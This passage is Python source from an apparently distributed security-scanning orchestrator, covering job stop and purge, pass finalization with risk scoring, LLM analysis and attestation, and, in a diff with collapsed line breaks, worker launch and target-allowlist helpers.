    AUTH_ATTEMPTS and ROUTE_DISCOVERY must be >= 1; STATEFUL_ACTIONS may be 0
    (stateful probes disabled).  Out-of-range overrides fall back to defaults.
    """
    def _normalize(merged, defaults):
        return {
            "AUTH_ATTEMPTS": _coerce_int(
                merged.get("AUTH_ATTEMPTS", defaults["AUTH_ATTEMPTS"]),
                defaults["AUTH_ATTEMPTS"], 1,
            ),
            "ROUTE_DISCOVERY": _coerce_int(
                merged.get("ROUTE_DISCOVERY", defaults["ROUTE_DISCOVERY"]),
                defaults["ROUTE_DISCOVERY"], 1,
            ),
            "STATEFUL_ACTIONS": _coerce_int(
                merged.get("STATEFUL_ACTIONS", defaults["STATEFUL_ACTIONS"]),
                defaults["STATEFUL_ACTIONS"], 0,
            ),
        }

    return resolve_config_block(
        owner,
        "GRAYBOX_BUDGETS",
        DEFAULT_GRAYBOX_BUDGETS_CONFIG,
        normalizer=_normalize,
    )
# ---- services/control.py ----
"""Job control operations: stop, purge, and monitoring-stop flows.

All functions take ``owner`` — the orchestration plugin instance — and
delegate storage access through the repository helpers below so that a
test double can override ``_get_job_state_repository`` /
``_get_artifact_repository`` on its class.
"""
from ..constants import (
    JOB_STATUS_FINALIZED,
    JOB_STATUS_RUNNING,
    JOB_STATUS_SCHEDULED_FOR_STOP,
    JOB_STATUS_STOPPED,
    RUN_MODE_CONTINUOUS_MONITORING,
)
from ..repositories import ArtifactRepository, JobStateRepository
from .secrets import collect_secret_refs_from_job_config
from .state_machine import set_job_status


def _job_repo(owner):
    # Prefer an owner-class override (lets tests/plugins swap the repository);
    # fall back to a fresh repository bound to the owner.
    getter = getattr(type(owner), "_get_job_state_repository", None)
    if callable(getter):
        return getter(owner)
    return JobStateRepository(owner)


def _artifact_repo(owner):
    # Same override pattern as _job_repo, for R1FS-style artifact storage.
    getter = getattr(type(owner), "_get_artifact_repository", None)
    if callable(getter):
        return getter(owner)
    return ArtifactRepository(owner)


def _write_job_record(owner, job_id, job_specs, context):
    # Route through the owner's write hook when present (it may normalize or
    # audit the write); otherwise persist directly and echo the specs back.
    write_job_record = getattr(type(owner), "_write_job_record", None)
    if callable(write_job_record):
        return write_job_record(owner, job_id, job_specs, context=context)
    _job_repo(owner).put_job(job_id, job_specs)
    return job_specs


def _delete_job_record(owner, job_id):
    # Same hook-or-fallback pattern for deletes.
    delete_job_record = getattr(type(owner), "_delete_job_record", None)
    if callable(delete_job_record):
        delete_job_record(owner, job_id)
        return
    _job_repo(owner).delete_job(job_id)


def stop_and_delete_job(owner, job_id: str):
    """
    Stop a running job, mark it stopped, then delegate to purge_job
    for full R1FS + CStore cleanup.
    """
    # Stop any worker threads running locally for this job first.
    local_workers = owner.scan_jobs.get(job_id)
    if local_workers:
        owner.P(f"Stopping and deleting job {job_id}.")
        for local_worker_id, job in local_workers.items():
            owner.P(f"Stopping job {job_id} on local worker {local_worker_id}.")
            job.stop()
        owner.P(f"Job {job_id} stopped.")
        owner.scan_jobs.pop(job_id, None)

    raw_job_specs = _job_repo(owner).get_job(job_id)
    if isinstance(raw_job_specs, dict):
        # Mark this node's worker entry finished/canceled and persist the
        # STOPPED status so peers see the job as stopped before the purge.
        _, job_specs = owner._normalize_job_record(job_id, raw_job_specs)
        worker_entry = job_specs.setdefault("workers", {}).setdefault(owner.ee_addr, {})
        worker_entry["finished"] = True
        worker_entry["canceled"] = True
        set_job_status(job_specs, JOB_STATUS_STOPPED)
        owner._emit_timeline_event(job_specs, "stopped", "Job stopped and deleted", actor_type="user")
        _write_job_record(owner, job_id, job_specs, context="stop_and_delete")
    else:
        # No stored record: nothing to purge, report an empty-success result.
        owner._log_audit_event("scan_stopped", {"job_id": job_id})
        return {"status": "success", "job_id": job_id, "cids_deleted": 0, "cids_total": 0}

    owner._log_audit_event("scan_stopped", {"job_id": job_id})
    return owner.purge_job(job_id)


def purge_job(owner, job_id: str):
    """
    Purge a job: delete all R1FS artifacts, clean up live progress keys,
    then tombstone the CStore entry.
    """
    raw = _job_repo(owner).get_job(job_id)
    if not isinstance(raw, dict):
        return {"status": "error", "message": f"Job {job_id} not found."}

    _, job_specs = owner._normalize_job_record(job_id, raw)

    # Refuse to purge while any worker is still active, or while the job is
    # in a non-terminal status with workers assigned.
    job_status = job_specs.get("job_status", "")
    workers = job_specs.get("workers", {})
    if workers and any(not w.get("finished") for w in workers.values()):
        return {"status": "error", "message": "Cannot purge a running job. Stop it first."}
    if job_status not in (JOB_STATUS_FINALIZED, JOB_STATUS_STOPPED) and workers:
        return {"status": "error", "message": "Cannot purge a running job. Stop it first."}

    # Collect every R1FS CID reachable from this job before deleting anything.
    cids = set()

    def _track(cid, source):
        # De-duplicated collection with a log trail of where each CID came from.
        if cid and isinstance(cid, str) and cid not in cids:
            cids.add(cid)
            owner.P(f"[PURGE] Collected CID {cid} from {source}")

    _track(job_specs.get("job_config_cid"), "job_specs.job_config_cid")
    artifacts = _artifact_repo(owner)
    job_config = artifacts.get_job_config(job_specs) if job_specs.get("job_config_cid") else {}
    if isinstance(job_config, dict):
        # Secrets referenced by the job config are stored as their own artifacts.
        for secret_ref in collect_secret_refs_from_job_config(job_config):
            _track(secret_ref, "job_config.secret_ref")

    # Finalized jobs: walk the archive for per-pass and per-worker report CIDs.
    job_cid = job_specs.get("job_cid")
    if job_cid:
        _track(job_cid, "job_specs.job_cid")
        try:
            archive = artifacts.get_json(job_cid)
            if isinstance(archive, dict):
                owner.P(f"[PURGE] Archive fetched OK, {len(archive.get('passes', []))} passes")
                for pi, pass_data in enumerate(archive.get("passes", [])):
                    _track(pass_data.get("aggregated_report_cid"), f"archive.passes[{pi}].aggregated_report_cid")
                    for addr, wr in (pass_data.get("worker_reports") or {}).items():
                        if isinstance(wr, dict):
                            _track(wr.get("report_cid"), f"archive.passes[{pi}].worker_reports[{addr}].report_cid")
            else:
                owner.P(f"[PURGE] Archive fetch returned non-dict: {type(archive)}", color='y')
        except Exception as e:
            # Best-effort: a missing archive must not block purging the rest.
            owner.P(f"[PURGE] Failed to fetch archive {job_cid}: {e}", color='r')

    for addr, w in workers.items():
        _track(w.get("report_cid"), f"workers[{addr}].report_cid")

    # Pass-report refs may point at further aggregated/worker report CIDs.
    for ri, ref in enumerate(job_specs.get("pass_reports", [])):
        report_cid = ref.get("report_cid")
        if report_cid:
            _track(report_cid, f"pass_reports[{ri}].report_cid")
            try:
                pass_data = artifacts.get_pass_report(report_cid)
                if isinstance(pass_data, dict):
                    _track(pass_data.get("aggregated_report_cid"), f"pass_reports[{ri}]->aggregated_report_cid")
                    for addr, wr in (pass_data.get("worker_reports") or {}).items():
                        if isinstance(wr, dict):
                            _track(wr.get("report_cid"), f"pass_reports[{ri}]->worker_reports[{addr}].report_cid")
                else:
                    owner.P(f"[PURGE] Pass report fetch returned non-dict: {type(pass_data)}", color='y')
            except Exception as e:
                owner.P(f"[PURGE] Failed to fetch pass report {report_cid}: {e}", color='r')

    owner.P(f"[PURGE] Total CIDs collected: {len(cids)}: {sorted(cids)}")

    # Delete artifacts; keep counts so a partial failure can be reported.
    deleted, failed = 0, 0
    for cid in cids:
        try:
            success = artifacts.delete(cid, show_logs=True, raise_on_error=False)
            if success:
                deleted += 1
                owner.P(f"[PURGE] Deleted CID {cid}")
            else:
                failed += 1
                owner.P(f"[PURGE] delete_file returned False for CID {cid}", color='r')
        except Exception as e:
            owner.P(f"[PURGE] Failed to delete CID {cid}: {e}", color='r')
            failed += 1

    if failed > 0:
        # Keep the CStore record so the caller can retry the purge later —
        # deleting it now would orphan the remaining artifacts.
        owner.P(f"Purge incomplete: {failed}/{len(cids)} CIDs failed. CStore kept.", color='r')
        return {
            "status": "partial",
            "job_id": job_id,
            "cids_deleted": deleted,
            "cids_failed": failed,
            "cids_total": len(cids),
            "message": "Some R1FS artifacts could not be deleted. Retry purge later.",
        }

    # Remove live-progress keys namespaced under "<job_id>:".
    all_live = _job_repo(owner).list_live_progress()
    if isinstance(all_live, dict):
        prefix = f"{job_id}:"
        for key in all_live:
            if key.startswith(prefix):
                _job_repo(owner).delete_live_progress(key)

    _job_repo(owner).delete_job_triage(job_id)
    _delete_job_record(owner, job_id)

    owner.P(f"Purged job {job_id}: {deleted}/{len(cids)} CIDs deleted.")
    owner._log_audit_event("job_purged", {"job_id": job_id, "cids_deleted": deleted, "cids_total": len(cids)})

    return {"status": "success", "job_id": job_id, "cids_deleted": deleted, "cids_total": len(cids)}


def stop_monitoring(owner, job_id: str, stop_type: str = "SOFT"):
    """
    Stop a job (any run mode with HARD stop, continuous-only for SOFT stop).
    """
    raw_job_specs = _job_repo(owner).get_job(job_id)
    if not raw_job_specs:
        return {"error": "Job not found", "job_id": job_id}

    _, job_specs = owner._normalize_job_record(job_id, raw_job_specs)
    stop_type = str(stop_type).upper()
    is_continuous = job_specs.get("run_mode") == RUN_MODE_CONTINUOUS_MONITORING

    # SOFT stop only makes sense for continuous jobs (it waits out the pass).
    if stop_type != "HARD" and not is_continuous:
        return {"error": "SOFT stop is only supported for CONTINUOUS_MONITORING jobs", "job_id": job_id}

    passes_completed = job_specs.get("job_pass", 1)

    if stop_type == "HARD":
        # Immediately stop local workers and mark this node finished/canceled.
        local_workers = owner.scan_jobs.get(job_id)
        if local_workers:
            for local_worker_id, job in local_workers.items():
                owner.P(f"Stopping job {job_id} on local worker {local_worker_id}.")
                job.stop()
            owner.scan_jobs.pop(job_id, None)

        worker_entry = job_specs.setdefault("workers", {}).setdefault(owner.ee_addr, {})
        worker_entry["finished"] = True
        worker_entry["canceled"] = True

        set_job_status(job_specs, JOB_STATUS_STOPPED)
        owner._emit_timeline_event(job_specs, "stopped", "Job stopped", actor_type="user")
        owner.P(f"Hard stop for job {job_id} after {passes_completed} passes")
    else:
        # SOFT: flag the job so the finalizer stops it after the current pass.
        set_job_status(job_specs, JOB_STATUS_SCHEDULED_FOR_STOP)
        owner._emit_timeline_event(job_specs, "scheduled_for_stop", "Stop scheduled", actor_type="user")
        owner.P(f"[CONTINUOUS] Soft stop scheduled for job {job_id} (will stop after current pass)")

    _write_job_record(owner, job_id, job_specs, context="stop_monitoring")

    return {
        "job_status": job_specs["job_status"],
        "stop_type": stop_type,
        "job_id": job_id,
        "passes_completed": passes_completed,
        "pass_reports": job_specs.get("pass_reports", []),
    }

# ---- services/finalization.py ----
import random

from
..constants import (
    JOB_STATUS_ANALYZING,
    JOB_STATUS_COLLECTING,
    JOB_STATUS_FINALIZED,
    JOB_STATUS_FINALIZING,
    JOB_STATUS_RUNNING,
    JOB_STATUS_SCHEDULED_FOR_STOP,
    JOB_STATUS_STOPPED,
    MAX_CONTINUOUS_PASSES,
    RUN_MODE_CONTINUOUS_MONITORING,
    RUN_MODE_SINGLEPASS,
)
from ..models import AggregatedScanData, PassReport, PassReportRef, WorkerReportMeta
from ..repositories import ArtifactRepository, JobStateRepository
from .config import get_attestation_config
from .config import get_llm_agent_config
from .state_machine import is_intermediate_job_status, is_terminal_job_status, set_job_status


def _job_repo(owner):
    # Owner-class override first (test/plugin hook), fresh repository otherwise.
    getter = getattr(type(owner), "_get_job_state_repository", None)
    if callable(getter):
        return getter(owner)
    return JobStateRepository(owner)


def _artifact_repo(owner):
    # Same override pattern for the R1FS-style artifact repository.
    getter = getattr(type(owner), "_get_artifact_repository", None)
    if callable(getter):
        return getter(owner)
    return ArtifactRepository(owner)


def _write_job_record(owner, job_key, job_specs, context):
    # NOTE(review): unlike the sibling helper in control.py, this fallback does
    # NOT persist via the repository — it only echoes job_specs back. Confirm
    # whether owners are always expected to provide _write_job_record here.
    write_job_record = getattr(type(owner), "_write_job_record", None)
    if callable(write_job_record):
        return write_job_record(owner, job_key, job_specs, context=context)
    return job_specs


def maybe_finalize_pass(owner):
    """
    Launcher finalizes completed passes and orchestrates continuous monitoring.

    Called from the launcher's process loop. For every job this node launched:
    - once all workers report finished, collect reports, score risk, optionally
      run LLM analysis, persist the pass report to R1FS, then either finalize
      (single-pass), stop (soft stop / pass cap), or schedule the next pass
      (continuous monitoring);
    - when a continuous job's next_pass_at deadline passes, reset worker
      state to start the next pass.
    """
    all_jobs = _job_repo(owner).list_jobs()
    artifacts = _artifact_repo(owner)

    for job_key, job_specs in all_jobs.items():
        normalized_key, job_specs = owner._normalize_job_record(job_key, job_specs)
        if normalized_key is None:
            continue

        # Only the launcher node finalizes a job.
        is_launcher = job_specs.get("launcher") == owner.ee_addr
        if not is_launcher:
            continue

        workers = job_specs.get("workers", {})
        if not workers:
            continue

        run_mode = job_specs.get("run_mode", RUN_MODE_SINGLEPASS)
        job_status = job_specs.get("job_status", JOB_STATUS_RUNNING)
        all_finished = all(w.get("finished") for w in workers.values())
        next_pass_at = job_specs.get("next_pass_at")
        job_pass = job_specs.get("job_pass", 1)
        job_id = job_specs.get("job_id")
        if is_terminal_job_status(job_status):
            # Recovery path: a terminal job with pass reports but no archive
            # CID means a previous archive build failed — retry it.
            if not job_specs.get("job_cid") and job_specs.get("pass_reports"):
                owner.P(f"[STUCK RECOVERY] {job_id} is {job_status} but has no job_cid — retrying archive build", color='y')
                owner._build_job_archive(job_id, job_specs)
            continue
        if is_intermediate_job_status(job_status):
            # Another finalization step is already in flight for this job.
            continue

        if all_finished and next_pass_at is None:
            # ---- Pass completed: collect, score, analyze, persist. ----
            pass_date_started = owner._get_timeline_date(job_specs, "pass_started") or owner._get_timeline_date(job_specs, "created")
            pass_date_completed = owner.time()
            now_ts = pass_date_completed

            set_job_status(job_specs, JOB_STATUS_COLLECTING)
            job_specs = _write_job_record(owner, job_key, job_specs, context="finalize_collecting")

            node_reports = owner._collect_node_reports(workers)
            aggregated = owner._get_aggregated_report(node_reports) if node_reports else {}

            # Risk scoring over the aggregated report (0-100 scale per log line below).
            risk_score = 0
            flat_findings = []
            risk_result = None
            if aggregated:
                risk_result, flat_findings = owner._compute_risk_and_findings(aggregated)
                risk_score = risk_result["score"]
                job_specs["risk_score"] = risk_score
                owner.P(f"Risk score for job {job_id} pass {job_pass}: {risk_score}/100")

            # Optional LLM analysis + quick summary (skipped after a
            # non-retryable provider/API failure on the main analysis).
            job_config = owner._get_job_config(job_specs)
            llm_cfg = get_llm_agent_config(owner)
            llm_text = None
            summary_text = None
            if llm_cfg["ENABLED"] and aggregated:
                set_job_status(job_specs, JOB_STATUS_ANALYZING)
                job_specs = _write_job_record(owner, job_key, job_specs, context="finalize_analyzing")
                llm_text = owner._run_aggregated_llm_analysis(job_id, aggregated, job_config)
                llm_status = getattr(owner, "_last_llm_analysis_status", None)
                if llm_status in {"api_request_error", "provider_request_error"}:
                    owner.P(
                        f"Skipping quick summary for job {job_id} after non-retryable LLM failure ({llm_status})",
                        color='y'
                    )
                else:
                    summary_text = owner._run_quick_summary_analysis(job_id, aggregated, job_config)

            # llm_failed is True or None (not False) so the archived pass
            # report omits the flag entirely when LLM analysis is disabled.
            llm_failed = True if (llm_cfg["ENABLED"] and (llm_text is None or summary_text is None)) else None
            if llm_failed:
                owner._emit_timeline_event(
                    job_specs, "llm_failed",
                    f"LLM analysis unavailable for pass {job_pass}",
                    meta={"pass_nr": job_pass}
                )

            # Per-worker report metadata for the pass report.
            worker_metas = {}
            for addr, report in node_reports.items():
                nr_findings = owner._count_all_findings(report)
                worker_metas[addr] = WorkerReportMeta(
                    report_cid=workers[addr].get("report_cid", ""),
                    start_port=report.get("start_port", 0),
                    end_port=report.get("end_port", 0),
                    ports_scanned=report.get("ports_scanned", 0),
                    open_ports=report.get("open_ports", []),
                    nr_findings=nr_findings,
                    node_ip=report.get("node_ip", ""),
                ).to_dict()

            # Persist the aggregated report; a failed put aborts this cycle so
            # the pass is retried on the next process-loop iteration.
            aggregated_report_cid = None
            if aggregated:
                aggregated_data = AggregatedScanData.from_dict(aggregated).to_dict()
                aggregated_report_cid = artifacts.put_json(aggregated_data, show_logs=False)
                if not aggregated_report_cid:
                    owner.P(f"Failed to store aggregated report for pass {job_pass} in R1FS", color='r')
                    continue

            # Blockchain test attestation — rate-limited for continuous jobs.
            redmesh_test_attestation = None
            should_submit_attestation = True
            if run_mode == RUN_MODE_CONTINUOUS_MONITORING:
                last_attestation_at = job_specs.get("last_attestation_at")
                min_interval = get_attestation_config(owner)["MIN_SECONDS_BETWEEN_SUBMITS"]
                if last_attestation_at is not None and now_ts - last_attestation_at < min_interval:
                    elapsed = round(now_ts - last_attestation_at)
                    owner.P(
                        f"[ATTESTATION] Skipping test attestation for job {job_id}: "
                        f"last submitted {elapsed}s ago, min interval is {min_interval}s",
                        color='y'
                    )
                    should_submit_attestation = False

            if should_submit_attestation:
                try:
                    attestation_node_ips = [
                        r.get("node_ip") for r in node_reports.values()
                        if r.get("node_ip")
                    ]
                    redmesh_test_attestation = owner._submit_redmesh_test_attestation(
                        job_id=job_id,
                        job_specs=job_specs,
                        workers=workers,
                        vulnerability_score=risk_score,
                        node_ips=attestation_node_ips,
                        report_cid=aggregated_report_cid,
                    )
                    if redmesh_test_attestation is not None:
                        job_specs["last_attestation_at"] = now_ts
                except Exception as exc:
                    # Attestation is best-effort: log verbosely, never fail the pass.
                    import traceback
                    owner.P(
                        f"[ATTESTATION] Failed to submit test attestation for job {job_id}: {exc}\n"
                        f"  Type: {type(exc).__name__}\n"
                        f"  Args: {exc.args}\n"
                        f"  Traceback:\n{traceback.format_exc()}",
                        color='r'
                    )

            # Merge per-worker scan metrics into one pass-level metrics blob.
            worker_scan_metrics = {}
            for addr, report in node_reports.items():
                if report.get("scan_metrics"):
                    entry = {"scan_metrics": report["scan_metrics"]}
                    if report.get("thread_scan_metrics"):
                        entry["threads"] = report["thread_scan_metrics"]
                    worker_scan_metrics[addr] = entry
            node_metrics = [e["scan_metrics"] for e in worker_scan_metrics.values()]
            pass_metrics = None
            if node_metrics:
                pass_metrics = node_metrics[0] if len(node_metrics) == 1 else owner._merge_worker_metrics(node_metrics)

            pass_report = PassReport(
                pass_nr=job_pass,
                date_started=pass_date_started,
                date_completed=pass_date_completed,
                duration=round(pass_date_completed - pass_date_started, 2) if pass_date_started else 0,
                aggregated_report_cid=aggregated_report_cid or "",
                worker_reports=worker_metas,
                risk_score=risk_score,
                risk_breakdown=risk_result["breakdown"] if risk_result else None,
                llm_analysis=llm_text,
                quick_summary=summary_text,
                llm_failed=llm_failed,
                findings=flat_findings if flat_findings else None,
                scan_metrics=pass_metrics,
                worker_scan_metrics=worker_scan_metrics if worker_scan_metrics else None,
                redmesh_test_attestation=redmesh_test_attestation,
            )

            pass_report_cid = artifacts.put_pass_report(pass_report, show_logs=False)
            if not pass_report_cid:
                # Abort and retry next cycle rather than losing the pass.
                owner.P(f"Failed to store pass report for pass {job_pass} in R1FS", color='r')
                continue

            job_specs.setdefault("pass_reports", []).append(
                PassReportRef(job_pass, pass_report_cid, risk_score).to_dict()
            )

            set_job_status(job_specs, JOB_STATUS_FINALIZING)
            job_specs = _write_job_record(owner, job_key, job_specs, context="finalize_finalizing")

            # ---- Terminal transition: single-pass jobs finalize here. ----
            if run_mode == RUN_MODE_SINGLEPASS:
                set_job_status(job_specs, JOB_STATUS_FINALIZED)
                owner._emit_timeline_event(job_specs, "scan_completed", "Scan completed")
                if redmesh_test_attestation is not None:
                    owner._emit_timeline_event(
                        job_specs, "blockchain_submit",
                        "Job-finished attestation submitted",
                        actor_type="system",
                        meta={**redmesh_test_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK}
                    )
                owner.P(f"[SINGLEPASS] Job {job_id} complete. Status set to FINALIZED.")
                owner._emit_timeline_event(job_specs, "finalized", "Job finalized")
                owner._build_job_archive(job_key, job_specs)
                owner._clear_live_progress(job_id, list(workers.keys()))
                continue

            # ---- Continuous: soft stop was requested during this pass. ----
            if job_status == JOB_STATUS_SCHEDULED_FOR_STOP:
                set_job_status(job_specs, JOB_STATUS_STOPPED)
                owner._emit_timeline_event(job_specs, "scan_completed", f"Scan completed (pass {job_pass})")
                if redmesh_test_attestation is not None:
                    owner._emit_timeline_event(
                        job_specs, "blockchain_submit",
                        f"Test attestation submitted (pass {job_pass})",
                        actor_type="system",
                        meta={**redmesh_test_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK}
                    )
                owner.P(f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. Status set to STOPPED (soft stop was scheduled)")
                owner._emit_timeline_event(job_specs, "stopped", "Job stopped")
                owner._build_job_archive(job_key, job_specs)
                owner._clear_live_progress(job_id, list(workers.keys()))
                continue

            # ---- Continuous: safety cap on total passes. ----
            if job_pass >= MAX_CONTINUOUS_PASSES:
                set_job_status(job_specs, JOB_STATUS_STOPPED)
                owner._emit_timeline_event(job_specs, "scan_completed", f"Scan completed (pass {job_pass})")
                owner._emit_timeline_event(
                    job_specs,
                    "pass_cap_reached",
                    f"Maximum continuous passes reached ({MAX_CONTINUOUS_PASSES})",
                    meta={"pass_nr": job_pass, "max_continuous_passes": MAX_CONTINUOUS_PASSES},
                )
                owner._log_audit_event("continuous_pass_cap_reached", {
                    "job_id": job_id,
                    "pass_nr": job_pass,
                    "max_continuous_passes": MAX_CONTINUOUS_PASSES,
                })
                if redmesh_test_attestation is not None:
                    owner._emit_timeline_event(
                        job_specs, "blockchain_submit",
                        f"Test attestation submitted (pass {job_pass})",
                        actor_type="system",
                        meta={**redmesh_test_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK}
                    )
                owner.P(
                    f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. "
                    f"Status set to STOPPED (max {MAX_CONTINUOUS_PASSES} passes reached)"
                )
                owner._emit_timeline_event(job_specs, "stopped", "Job stopped")
                owner._build_job_archive(job_key, job_specs)
                owner._clear_live_progress(job_id, list(workers.keys()))
                continue

            # ---- Continuous: schedule the next pass with jitter. ----
            if redmesh_test_attestation is not None:
                owner._emit_timeline_event(
                    job_specs, "blockchain_submit",
                    f"Test attestation submitted (pass {job_pass})",
                    actor_type="system",
                    meta={**redmesh_test_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK}
                )
            set_job_status(job_specs, JOB_STATUS_RUNNING)
            interval = job_config.get("monitor_interval", owner.cfg_monitor_interval)
            jitter = random.uniform(0, owner.cfg_monitor_jitter)
            job_specs["next_pass_at"] = owner.time() + interval + jitter
            owner._emit_timeline_event(job_specs, "pass_completed", f"Pass {job_pass} completed")

            owner.P(f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. Next pass in {interval}s (+{jitter:.1f}s jitter)")
            _write_job_record(owner, job_key, job_specs, context="continuous_next_pass")
            owner._clear_live_progress(job_id, list(workers.keys()))

            # Drop cached completion state so the next pass re-reports cleanly.
            owner.completed_jobs_reports.pop(job_id, None)
            if job_id in owner.lst_completed_jobs:
                owner.lst_completed_jobs.remove(job_id)

        elif run_mode == RUN_MODE_CONTINUOUS_MONITORING and all_finished and next_pass_at and owner.time() >= next_pass_at:
            # ---- Continuous: deadline reached, kick off the next pass. ----
            job_specs["job_pass"] = job_pass + 1
            job_specs["next_pass_at"] = None
            owner._emit_timeline_event(job_specs, "pass_started", f"Pass {job_pass + 1} started")

            # Reset per-worker completion state so workers re-run their ranges.
            for addr in workers:
                workers[addr]["finished"] = False
                workers[addr]["result"] = None
                workers[addr]["report_cid"] = None

            _write_job_record(owner, job_key, job_specs, context="continuous_restart")
            owner.P(f"[CONTINUOUS] Starting pass {job_pass + 1} for job {job_id}")
/dev/null +++ b/extensions/business/cybersec/red_mesh/services/launch.py @@ -0,0 +1,163 @@ +import random + +from ..constants import ( + PORT_ORDER_SEQUENTIAL, + PORT_ORDER_SHUFFLE, + ScanType, +) +from ..models import JobConfig +from .scan_strategy import get_scan_strategy + + +def _launch_network_jobs( + owner, + strategy, + *, + job_id, + target, + launcher, + start_port, + end_port, + job_config, + nr_local_workers_override=None, +): + exceptions = job_config.get("exceptions", []) + if not isinstance(exceptions, list): + exceptions = [] + port_order = job_config.get("port_order", owner.cfg_port_order) + excluded_features = job_config.get("excluded_features", owner.cfg_excluded_features) + enabled_features = job_config.get("enabled_features", []) + scan_min_delay = job_config.get("scan_min_delay", owner.cfg_scan_min_rnd_delay) + scan_max_delay = job_config.get("scan_max_delay", owner.cfg_scan_max_rnd_delay) + ics_safe_mode = job_config.get("ics_safe_mode", owner.cfg_ics_safe_mode) + scanner_identity = job_config.get("scanner_identity", owner.cfg_scanner_identity) + scanner_user_agent = job_config.get("scanner_user_agent", owner.cfg_scanner_user_agent) + workers_from_spec = job_config.get("nr_local_workers") + if nr_local_workers_override is not None: + workers_requested = nr_local_workers_override + elif workers_from_spec is not None and int(workers_from_spec) > 0: + workers_requested = int(workers_from_spec) + else: + workers_requested = owner.cfg_nr_local_workers + + owner.P("Using {} local workers for job {}".format(workers_requested, job_id)) + + ports = list(range(start_port, end_port + 1)) + batches = [] + if port_order == PORT_ORDER_SEQUENTIAL: + ports = sorted(ports) + else: + port_order = PORT_ORDER_SHUFFLE + random.shuffle(ports) + + nr_ports = len(ports) + if nr_ports == 0: + raise ValueError("No ports available for local workers.") + + workers_requested = max(1, min(workers_requested, nr_ports)) + base_chunk, remainder = divmod(nr_ports, 
workers_requested) + start_index = 0 + for index in range(workers_requested): + chunk = base_chunk + (1 if index < remainder else 0) + end_index = start_index + chunk + batch = ports[start_index:end_index] + if batch: + batches.append(batch) + start_index = end_index + + if not batches: + raise ValueError("Unable to allocate port batches to workers.") + + local_jobs = {} + for index, batch in enumerate(batches): + try: + owner.P("Launching {} requested by {} for target {} - {} ports. Port order {}".format( + job_id, launcher, target, len(batch), port_order + )) + batch_job = strategy.worker_cls( + owner=owner, + local_id_prefix=str(index + 1), + target=target, + job_id=job_id, + initiator=launcher, + exceptions=exceptions, + worker_target_ports=batch, + excluded_features=excluded_features, + enabled_features=enabled_features, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + ) + batch_job.start() + local_jobs[batch_job.local_worker_id] = batch_job + except Exception as exc: + owner.P( + "Failed to launch batch local job for ports [{}-{}]. 
Port order {}: {}".format( + min(batch) if batch else "-", + max(batch) if batch else "-", + port_order, + exc, + ), + color='r' + ) + + if not local_jobs: + raise ValueError("No local workers could be launched for the requested port range.") + return local_jobs + + +def _launch_webapp_job( + owner, + strategy, + *, + job_id, + launcher, + job_config, +): + job_config_obj = JobConfig.from_dict(job_config) + worker = strategy.worker_cls( + owner=owner, + job_id=job_id, + target_url=job_config_obj.target_url, + job_config=job_config_obj, + local_id="1", + initiator=launcher, + ) + worker.start() + return {worker.local_worker_id: worker} + + +def launch_local_jobs( + owner, + *, + job_id, + target, + launcher, + start_port, + end_port, + job_config, + nr_local_workers_override=None, +): + strategy = get_scan_strategy(job_config.get("scan_type", ScanType.NETWORK.value)) + if strategy.scan_type == ScanType.WEBAPP: + return _launch_webapp_job( + owner, + strategy, + job_id=job_id, + launcher=launcher, + job_config=job_config, + ) + + return _launch_network_jobs( + owner, + strategy, + job_id=job_id, + target=target, + launcher=launcher, + start_port=start_port, + end_port=end_port, + job_config=job_config, + nr_local_workers_override=nr_local_workers_override, + ) diff --git a/extensions/business/cybersec/red_mesh/services/launch_api.py b/extensions/business/cybersec/red_mesh/services/launch_api.py new file mode 100644 index 00000000..fa129e2e --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/launch_api.py @@ -0,0 +1,958 @@ +from copy import deepcopy +from urllib.parse import urlparse + +from ..constants import ( + DISTRIBUTION_MIRROR, + DISTRIBUTION_SLICE, + JOB_STATUS_RUNNING, + LOCAL_WORKERS_MAX, + LOCAL_WORKERS_MIN, + PORT_ORDER_SEQUENTIAL, + PORT_ORDER_SHUFFLE, + RUN_MODE_CONTINUOUS_MONITORING, + RUN_MODE_SINGLEPASS, + ScanType, +) +from ..models import CStoreJobRunning, JobConfig +from ..repositories import JobStateRepository +from .config import 
get_graybox_budgets_config +from .secrets import persist_job_config_with_secrets + + +def _job_repo(owner): + getter = getattr(type(owner), "_get_job_state_repository", None) + if callable(getter): + return getter(owner) + return JobStateRepository(owner) + + +def validation_error(message: str): + """Return a consistent validation error payload.""" + return {"error": "validation_error", "message": message} + + +def _normalize_allowlist(entries): + if not entries: + return [] + if not isinstance(entries, (str, list, tuple, set)): + return [] + if isinstance(entries, str): + entries = [entries] + normalized = [] + for entry in entries: + value = str(entry).strip() + if value: + normalized.append(value.lower()) + return normalized + + +def _split_allowlist_entries(entries): + hosts = [] + scopes = [] + for entry in _normalize_allowlist(entries): + if entry.startswith("/"): + scopes.append(entry) + continue + if "://" in entry: + parsed = urlparse(entry) + if parsed.hostname: + hosts.append(parsed.hostname.lower()) + if parsed.path and parsed.path != "/": + scopes.append(parsed.path.rstrip("/")) + continue + hosts.append(entry) + return hosts, scopes + + +def _host_in_allowlist(hostname: str, entries) -> bool: + hostname = (hostname or "").strip().lower() + if not hostname: + return False + hosts, _ = _split_allowlist_entries(entries) + if not hosts: + return True + return any(hostname == entry or hostname.endswith("." 
def _scope_in_allowlist(scope_prefix: str, entries) -> bool:
    """True when *scope_prefix* is covered by the allowlist's scope entries."""
    _, scopes = _split_allowlist_entries(entries)
    if not scopes:
        # No scope entries configured: scopes are unconstrained.
        return True
    candidate = (scope_prefix or "").strip()
    return bool(candidate) and any(candidate.startswith(allowed) for allowed in scopes)


def _extract_scope_prefix(target_config) -> str:
    """Pull ``discovery.scope_prefix`` out of a target-config dict ("" if absent)."""
    if not isinstance(target_config, dict):
        return ""
    discovery = target_config.get("discovery") or {}
    if not isinstance(discovery, dict):
        return ""
    return str(discovery.get("scope_prefix", "") or "")


def _extract_discovery_max_pages(target_config) -> int:
    """Pull ``discovery.max_pages`` out of a target-config dict (default 50, floor 1)."""
    if not isinstance(target_config, dict):
        return 50
    discovery = target_config.get("discovery") or {}
